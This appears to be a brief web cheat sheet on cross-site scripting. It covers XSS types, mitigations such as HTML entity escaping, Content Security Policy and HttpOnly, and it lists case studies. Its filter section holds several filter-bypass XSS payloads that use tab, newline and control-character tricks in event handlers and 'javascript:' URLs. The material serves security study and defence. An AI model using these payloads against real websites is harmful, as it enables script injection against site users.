Skip to content

XSS

Cross-site scripting (XSS) cheat sheet

  • Type
  • Self-XSS
  • Reflected XSS
  • Stored XSS
  • Mitigation

  • Filter

    Pattern Bypass
    [SPACE]on...= <TAB>onload=alert(1)>
    [SPACE]on...= \nonload=alert(1)>
    [SPACE]on...=
    javascript: <a href="\x01javascript:alert(1)">X</a>
    javascript: <a href="java\tscript:alert(1)">X</a>
    javascript: <a href="java&Tab;script:alert(1)">X</a>
    <script JSFuck

  • Escape (HTML Entity)

    Symbol Alternative
    < &lt;
    > &gt;
    " &quot;

  • Content Security Policy (CSP) > CSP Evaluator

    • script-src
    • Nonce
  • trusted-types (Chrome)
  • HTTP response header
  • Define trusted resources
  • HttpOnly
  • Bypass
  • <base>
    • Change base URL of all relative URL
  • Relative Path Overwrite (RPO)
  • Case Study
  • XS-Search abusing the Chrome XSS Auditor
  • Mutation XSS in Google Search
  • Breaking XSS mitigations via Script Gadgets